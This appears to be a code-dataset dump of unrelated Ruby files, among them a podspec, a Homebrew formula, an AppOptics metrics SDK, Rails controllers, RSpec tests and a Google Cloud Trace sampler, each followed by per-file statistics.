# Be sure to run `pod spec lint StashAnalytics.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://guides.cocoapods.org/syntax/podspec.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |spec|
spec.name = "StashAnalytics"
spec.version = "0.0.3"
  spec.summary      = "Stash is a simple, privacy-focused mobile analytics library"
spec.homepage = "http://usestash.com"
spec.license = "MIT"
spec.author = "Ciprian Redinciuc"
spec.platform = :ios, "14.0"
spec.ios.deployment_target = "14.0"
# spec.osx.deployment_target = "10.7"
# spec.watchos.deployment_target = "2.0"
# spec.tvos.deployment_target = "9.0"
spec.source = { :git => "https://github.com/usestash/stash-ios.git", :tag => "v#{spec.version}" }
spec.source_files = "Sources"
spec.swift_versions = ['5.0']
end
| 36.481481 | 99 | 0.692386 |
2146e50cd20d008e36cc5b3b79f57d0bca0e3803 | 92 | desc "Open a pry session preloaded with this library"
task :console do
sh "pry --gem"
end
| 18.4 | 53 | 0.728261 |
28e232a4a6e003fc9265f388a178999e8bec2b91 | 3,784 | #--
# Copyright (c) 2016 SolarWinds, LLC.
# All rights reserved.
#++
module AppOpticsAPM
module SDK
module CustomMetrics
# Send counts
#
# Use this method to report the number of times an action occurs. The metric counts reported are summed and flushed every 60 seconds.
#
# === Arguments:
#
# * +name+ (String) Name to be used for the metric. Must be 255 or fewer characters and consist only of A-Za-z0-9.:-*
# * +count+ (Integer, optional, default = 1): Count of actions being reported
# * +with_hostname+ (Boolean, optional, default = false): Indicates if the host name should be included as a tag for the metric
# * +tags_kvs+ (Hash, optional): List of key/value pairs to describe the metric. The key must be <= 64 characters, the value must be <= 255 characters, allowed characters: A-Za-z0-9.:-_
#
# === Example:
#
# class WorkTracker
# def counting(name, tags = {})
# yield # yield to where work is done
# AppOpticsAPM::SDK.increment_metric(name, 1, false, tags)
# end
# end
#
# === Returns:
# * 0 on success, error code on failure
#
def increment_metric(name, count = 1, with_hostname = false, tags_kvs = {})
return true unless AppOpticsAPM.loaded
with_hostname = with_hostname ? 1 : 0
tags, tags_count = make_tags(tags_kvs)
AppOpticsAPM::CustomMetrics.increment(name.to_s, count, with_hostname, nil, tags, tags_count) == 1
end
# Send values with counts
#
# Use this method to report a value for each or multiple counts. The metric values reported are aggregated and flushed every 60 seconds. The dashboard displays the average value per count.
#
# === Arguments:
#
# * +name+ (String) Name to be used for the metric. Must be 255 or fewer characters and consist only of A-Za-z0-9.:-*
# * +value+ (Numeric) Value to be added to the current sum
# * +count+ (Integer, optional, default = 1): Count of actions being reported
# * +with_hostname+ (Boolean, optional, default = false): Indicates if the host name should be included as a tag for the metric
# * +tags_kvs+ (Hash, optional): List of key/value pairs to describe the metric. The key must be <= 64 characters, the value must be <= 255 characters, allowed characters: A-Za-z0-9.:-_
#
# === Example:
#
# class WorkTracker
# def timing(name, tags = {})
# start = Time.now
# yield # yield to where work is done
# duration = Time.now - start
# AppOpticsAPM::SDK.summary_metric(name, duration, 1, false, tags)
# end
# end
#
# === Returns:
# * 0 on success, error code on failure
#
def summary_metric(name, value, count = 1, with_hostname = false, tags_kvs = {})
return true unless AppOpticsAPM.loaded
with_hostname = with_hostname ? 1 : 0
tags, tags_count = make_tags(tags_kvs)
AppOpticsAPM::CustomMetrics.summary(name.to_s, value, count, with_hostname, nil, tags, tags_count) == 1
end
private
def make_tags(tags_kvs)
unless tags_kvs.is_a?(Hash)
AppOpticsAPM.logger.warn("[appoptics_apm/metrics] CustomMetrics received tags_kvs that are not a Hash (found #{tags_kvs.class}), setting tags_kvs = {}")
tags_kvs = {}
end
count = tags_kvs.size
tags = AppOpticsAPM::MetricTags.new(count)
tags_kvs.each_with_index do |(k, v), i|
tags.add(i, k.to_s, v.to_s)
end
[tags, count]
end
end
extend CustomMetrics
end
end
| 39.831579 | 196 | 0.607822 |
7a1c82b1e2765ee3fbf761b62997f565942009d2 | 1,011 | class Cocoapods < Formula
desc "Dependency manager for Cocoa projects"
homepage "https://cocoapods.org/"
url "https://github.com/CocoaPods/CocoaPods/archive/1.6.0.tar.gz"
sha256 "7980fc1675d16c978324614f6ff6d2f98153e6805174c566cfa84cec9c336ba9"
bottle do
cellar :any_skip_relocation
sha256 "17db9489e0ca4fb2349b1f0046d7b5224a5764c420f575947719f605c3828d97" => :mojave
sha256 "fc004c866c668214225c4cc606bc00dc1418c577be1d58f166075ba998d32f6a" => :high_sierra
sha256 "9c31c82dd47fe218430bb21ff6b699e928d6f5df46ac0b7483ec679d678916a5" => :sierra
end
depends_on "ruby" if MacOS.version <= :sierra
def install
ENV["GEM_HOME"] = libexec
system "gem", "build", "cocoapods.gemspec"
system "gem", "install", "cocoapods-#{version}.gem"
# Other executables don't work currently.
bin.install libexec/"bin/pod", libexec/"bin/xcodeproj"
bin.env_script_all_files(libexec/"bin", :GEM_HOME => ENV["GEM_HOME"])
end
test do
system "#{bin}/pod", "list"
end
end
| 34.862069 | 93 | 0.748764 |
6aecb88080231a335975bbd8dc78bf5374d21883 | 1,011 | module Archer
module Routes
class Route
delegate :match?, to: :matcher
attr_reader :controller, :action
def initialize param, options
@type = options[:type]
@controller_path, @action = options[:to].split '#'
@action = @action.to_sym
@param = param
end
def view
@view ||= Views::ViewFinder.find_for @controller_path, @action
end
def for update
@controller = controller_klass.new update
self
end
private
      def matcher
        # Pick a matching strategy from the route parameter: a Regexp
        # matches message text, a Symbol matches a bot command, a Class
        # is instantiated as a custom matcher, and anything else falls
        # back to matching on the update type alone.
        @matcher ||= \
          case @param
          when Regexp
            Matchers::RegexpMatcher.new @param, @type
          when Symbol
            Matchers::CommandMatcher.new @param, @type
          when Class
            @param.new
          else
            Matchers::TypeMatcher.new @type
          end
      end
def controller_klass
@controller_klass ||= "#{ @controller_path.camelize }Controller".constantize
end
end
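    # Illustrative usage (assumed wiring; the routing DSL that builds
    # these routes is not shown in this file):
    #
    #   route = Route.new(:start, type: :command, to: 'welcome#index')
    #   route.for(update).controller.send(route.action) if route.match?(update)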
end
end
| 20.632653 | 84 | 0.558853 |
e8bc0d4f2c9b40e100c0c02fc0a8e1ab83541bd3 | 880 | require 'spec_helper_acceptance'
# Ensure SELinux is not disabled in bootloader configuration - Section 1.6.1.1
describe file('/etc/default/grub') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
its(:content) { should match /GRUB_CMDLINE_LINUX_DEFAULT="quiet"/ }
its(:content) { should match /GRUB_CMDLINE_LINUX="audit=1"/ }
end
# Ensure the SELinux state is "enforcing" - Section 1.6.1.2
describe file('/etc/selinux/config') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
its(:content) { should match /SELINUX=enforcing/ }
its(:content) { should match /SELINUXTYPE=targeted/ }
end
# Ensure SETroubleshoot is not installed - Section 1.6.1.4
describe package('selinuxtroubleshoot') do
  it { should_not be_installed }
end
| 33.846154 | 78 | 0.701136 |
267f1ec7b521a9f1d643b800ae0ee9ae7b126574 | 242 | class CreateRepresentatives < ActiveRecord::Migration[5.1]
def change
create_table :representatives do |t|
t.string :name
t.string :party
t.string :office
t.integer :money
t.string :cid
end
end
end
| 17.285714 | 58 | 0.644628 |
793672b1d58e8e03f574aeabb38e0c96fd58415e | 1,462 | # coding: utf-8
class NotesController < ApplicationController
load_and_authorize_resource
before_filter :init_base_breadcrumb
def init_base_breadcrumb
drop_breadcrumb(t("menu.notes"), notes_path)
end
def index
@notes = current_user.notes.recent_updated.paginate(:page => params[:page], :per_page => 20)
set_seo_meta t("menu.notes")
drop_breadcrumb("列表")
end
def show
@note = Note.find(params[:id])
@note.hits.incr(1)
set_seo_meta("查看 » #{t("menu.notes")}")
drop_breadcrumb("查看")
end
def new
@note = current_user.notes.build
set_seo_meta("新建 » #{t("menu.notes")}")
drop_breadcrumb(t("common.create"))
end
def edit
@note = current_user.notes.find(params[:id])
set_seo_meta("修改 » #{t("menu.notes")}")
drop_breadcrumb("修改")
end
def create
@note = current_user.notes.new(params[:note])
if @note.save
redirect_to(@note, :notice => t("common.create_success"))
else
render :action => "new"
end
end
def update
@note = current_user.notes.find(params[:id])
if @note.update_attributes(params[:note])
redirect_to(@note, :notice => t("common.update_success"))
else
render :action => "edit"
end
end
def preview
render :text => MarkdownConverter.convert( params[:body] )
end
def destroy
@note = current_user.notes.find(params[:id])
@note.destroy
redirect_to(notes_url)
end
end
| 21.5 | 96 | 0.656635 |
28254cf0f9d2046c7738dc655e5940777f1f90a0 | 118 | class ApplicationController < ActionController::Base
def hello
render text: "hello, world!"
end
end
| 19.666667 | 52 | 0.677966 |
010dd1ef3847f2d47645483ad8b1c43eee760649 | 692 | module Hyperstack
module Component
module FreeRender
def self.included(base)
base.instance_eval do
alias :hyperstack_component_original_meth_missing method_missing
def method_missing(name, *args, &block)
if const_defined?(name) &&
(klass = const_get(name)) &&
((klass.is_a?(Class) && klass.method_defined?(:render)) ||
Hyperstack::Internal::Component::Tags::HTML_TAGS.include?(klass))
render(klass, *args, &block)
else
hyperstack_component_original_meth_missing(name, *args, &block)
end
end
end
end
end
end
end
| 31.454545 | 82 | 0.583815 |
03d83495a02f30d6a9fcc40c8b09d566e5696313 | 1,301 | # Copyright [2020] [University of Aizu]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Ansible
module Roles
module File
class Create < Base
def initialize(args)
super(
resource_path: "#{ANSIBLE_ROLES_TEMPLATE_PATH}/file/create",
role_path: "#{args[:role_dir]}/#{args[:data]['name']}.file.create",
dir: "#{args[:data]['name']}.file.create",
data: args[:data]['file_create']
)
end
def create
super
create_files
end
private
def create_files
FileUtils.mkdir_p("#{@role_path}/files")
::File.open("#{@role_path}/files/file", 'w+') do |f|
f.puts(@data['content'])
end
end
end
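      # Illustrative construction (data shape inferred from the attribute
      # accesses above; paths and values are placeholders):
      #
      #   Ansible::Roles::File::Create.new(
      #     role_dir: '/tmp/roles',
      #     data: { 'name' => 'web', 'file_create' => { 'content' => 'hello' } }
      #   ).create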
end
end
end
| 28.911111 | 79 | 0.618755 |
032a2ad6b727a4656eec5b195b1692936cf9abb7 | 3,718 | # Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Cloud
module Trace
##
# A sampler determines whether a given request's latency trace should
# actually be reported. It is usually not necessary to trace every
# request, especially for an application serving heavy traffic. You may
# use a sampler to decide, for a given request, whether to report its
# trace. A sampler is simply a Proc that takes the Rack environment as an
# argument and returns a boolean indicating whether or not to sample the
      # current request. Alternatively, it could be an object that duck-types the
# Proc interface by implementing the `call` method.
#
# TimeSampler is the default sampler. It bases its sampling decision on
# two considerations:
#
# 1. It allows you to blacklist certain URI paths that should never be
# traced. For example, the Google App Engine health check request
# path `/_ah/health` is blacklisted by default.
# 2. It spaces samples out by delaying a minimum time between each
# sample. This enforces a maximum QPS for this Ruby process.
#
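      # Example (illustrative; the Rack middleware normally constructs
      # the sampler itself, and the "/status" path below is hypothetical):
      #
      #   sampler = Google::Cloud::Trace::TimeSampler.new \
      #     qps: 0.5, path_blacklist: ["/_ah/health", "/status"]
      #   sampler.call rack_env  # => true when this request should be traced
      #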
class TimeSampler
##
# Default list of paths for which to disable traces. Currently includes
# App Engine Flex health checks.
DEFAULT_PATH_BLACKLIST = ["/_ah/health"].freeze
##
# Create a TimeSampler for the given QPS.
#
# @param [Number] qps Samples per second. Default is 0.1.
# @param [Array{String,Regex}] path_blacklist An array of paths or
# path patterns indicating URIs that should never be traced.
# Default is DEFAULT_PATH_BLACKLIST.
#
def initialize qps: 0.1, path_blacklist: DEFAULT_PATH_BLACKLIST
@delay_secs = 1.0 / qps
@last_time = ::Time.now.to_f - @delay_secs
@path_blacklist = path_blacklist
end
@default = new
##
# Get the default global TimeSampler.
#
# @return [TimeSampler]
#
def self.default
@default
end
##
# Implements the sampler contract. Checks to see whether a sample
# should be taken at this time.
#
# @param [Hash] env Rack environment.
# @return [Boolean] Whether to sample at this time.
#
        def call env
          return false if path_blacklisted? env
          time = ::Time.now.to_f
          # How many delay intervals have elapsed since the last sample.
          delays = (time - @last_time) / @delay_secs
          if delays >= 2.0
            # Far behind schedule: resynchronize so at most one interval
            # of credit carries forward, and sample this request.
            @last_time = time - @delay_secs
            true
          elsif delays >= 1.0
            # Exactly one interval has elapsed: consume it and sample.
            @last_time += @delay_secs
            true
          else
            # Too soon since the last sample.
            false
          end
        end
##
# Determines if the URI path in the given Rack environment is
# blacklisted in this sampler.
#
# @private
#
def path_blacklisted? env
path = "#{env['SCRIPT_NAME']}#{env['PATH_INFO']}"
path = "/#{path}" unless path.start_with? "/"
@path_blacklist.find { |p| p === path }
end
end
end
end
end
| 35.409524 | 79 | 0.615654 |
21fdbf96430ec82c3bc44d24621d8cb08a05b514 | 186 | class Favourite < ActiveRecord::Base
# This is Sinatra! Remember to create a migration!
belongs_to :user
belongs_to :product
validates :user_id, uniqueness: {scope: :product_id}
end
| 26.571429 | 53 | 0.774194 |
bf14887e7146eee2fb24c7ca5fc43e6ab3a158dd | 785 | require_relative '../automated_init'
context "Publish" do
context "Expected Version" do
publish = Publish.new
entity = Controls::Entity.example
version = Controls::Version.example
publish.store.add(entity.id, entity, version)
recorded_event = Controls::Messages::Recorded.example
publish.clock.now = Clock.parse(recorded_event.time)
publish.(recorded_event)
writer = publish.write
published = writer.one_message do |event|
event.instance_of?(Messages::Events::Published)
end
refute(published.nil?)
test "Is not set" do
is_entity_version = writer.written?(published) do |_, expected_version|
expected_version.nil? && expected_version != version
end
assert(is_entity_version)
end
end
end
| 22.428571 | 77 | 0.698089 |
b92944ebfdcfa6a15ccc98edf041dfad3777d1e6 | 447 | class Micropost < ApplicationRecord
belongs_to :user
default_scope -> {order(created_at: :desc)}
mount_uploader :picture, PictureUploader
validates :user_id, presence: true
validates :content, presence: true, length: { maximum: 140 }
validate :picture_size
private
    # Validate the size of an uploaded picture
def picture_size
if picture.size > 5.megabytes
errors.add(:picture, "should be less than 5MB")
end
end
end
| 24.833333 | 62 | 0.713647 |
619a92e78e4ad7239c8fd7d844e0c53e8d765894 | 2,376 | require "spec_helper"
RSpec.describe Blurb::Snapshot do
include_context "shared setup"
describe "#create" do
context "given a keywords recordType" do
it "returns a keywords snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::KEYWORDS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
status = Blurb::Snapshot.status(payload_response["snapshotId"])
if status && status["location"]
report = Blurb::Snapshot.download(status["location"])
expect(report).not_to be nil
end
end
end
context "given a campaign recordType" do
it "returns a campaign snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::CAMPAIGNS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a ad_group recordType" do
it "returns a ad_group snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::AD_GROUPS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a product_ad recordType" do
it "returns a product_ad snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::PRODUCT_ADS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a negativeKeywords recordType" do
it "returns a negativeKeywords snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::NEGATIVE_KEYWORDS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a campaignNegativeKeywords recordType" do
it "returns a campaignNegativeKeywords snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::CAMPAIGN_NEGATIVE_KEYWORDS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
end
end
| 28.97561 | 71 | 0.633838 |
284e4fa9adcb3579453bfa5e512217b7c85deb29 | 213 | class RemovePhotoFieldsFromBeer < ActiveRecord::Migration
def change
remove_column :beers, :photo_file_name
remove_column :beers, :photo_content_type
remove_column :beers, :photo_file_size
end
end
| 26.625 | 57 | 0.788732 |
391cb48576df2d4018fa5deacf55b158feb609fd | 2,547 |
require_relative '../../../spec_helper'
require_relative '../../../factories/users_helper'
describe Carto::Kuviz::VisualizationsController do
include Warden::Test::Helpers
after(:all) do
FileUtils.rmtree(Carto::Conf.new.public_uploads_path + '/kuviz_assets')
end
describe '#show' do
before(:each) do
@kuviz = FactoryGirl.create(:kuviz_visualization)
@kuviz.save
@asset = Carto::Asset.for_visualization(visualization: @kuviz,
resource: StringIO.new('<html><body>test</body></html>'))
@asset.save
login(@kuviz.user)
end
it 'shows public kuviz' do
get kuviz_show_url(id: @kuviz.id)
response.status.should eq 200
response.body.scan(/test/).present?.should == true
response.headers.include?('X-Frame-Options').should == false
end
it 'shows 404 on non-existent kuviz' do
get kuviz_show_url(id: 'fake-uuid')
response.status.should eq 404
end
it 'shows password protected kuviz' do
@kuviz.privacy = Carto::Visualization::PRIVACY_PROTECTED
@kuviz.password = 'test'
@kuviz.save
get kuviz_show_url(id: @kuviz.id)
response.status.should eq 200
response.body.scan(/Insert your password/).present?.should == true
end
end
describe '#show_protected' do
before(:each) do
@kuviz = FactoryGirl.create(:kuviz_protected_visualization)
@kuviz.save
@asset = Carto::Asset.for_visualization(visualization: @kuviz,
resource: StringIO.new('<html><body>test</body></html>'))
@asset.save
login(@kuviz.user)
end
it 'shows password error message is the password is incorrect' do
post kuviz_password_protected_url(id: @kuviz.id), password: 'wrong_password'
response.status.should eq 200
response.body.scan(/Invalid password/).present?.should == true
end
it 'shows 404 if the kuviz is not password protected' do
@kuviz.password = ''
@kuviz.privacy = Carto::Visualization::PRIVACY_PUBLIC
@kuviz.save
post kuviz_password_protected_url(id: @kuviz.id), password: 'wrong_password'
response.status.should eq 404
end
it 'shows password protected kuviz' do
post kuviz_password_protected_url(id: @kuviz.id), password: 'test'
response.status.should eq 200
response.body.scan(/<body>test<\/body>/).present?.should == true
response.headers.include?('X-Frame-Options').should == false
end
end
end
| 30.686747 | 103 | 0.65214 |
e9eef1ed17d5b31ad2266d4fbbc477fbfcc009a2 | 1,299 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'liquid-validator/version'
Gem::Specification.new do |spec|
spec.name = "liquid-validator"
spec.version = LiquidValidator::VERSION
spec.authors = ["Jeremy W. Rowe"]
spec.email = ["[email protected]"]
spec.description = %q{Liquid template validator}
  spec.summary       = %q{Validates template strings that are consumed when creating a liquid template. It is simple; that is the point.}
spec.homepage = "https://github.com/jeremywrowe/liquid-validator"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test)/})
spec.require_paths = ["lib"]
spec.add_dependency('liquid', '>= 2.4.0')
spec.add_development_dependency "bundler", "~> 1.16.0"
spec.add_development_dependency "rake"
spec.add_development_dependency "minitest"
spec.add_development_dependency "pry"
spec.add_development_dependency "rubocop"
spec.add_development_dependency "appraisal"
end
| 39.363636 | 137 | 0.683603 |
26c3e59dee1988ceaeaccc748bb5e25a738857db | 200 | class GroupSerializer < ActiveModel::Serializer
attributes(
:id,
:name,
:organization_id,
:group_type,
:archived,
:test,
:dummy,
:created_at,
:updated_at
)
end
| 14.285714 | 47 | 0.61 |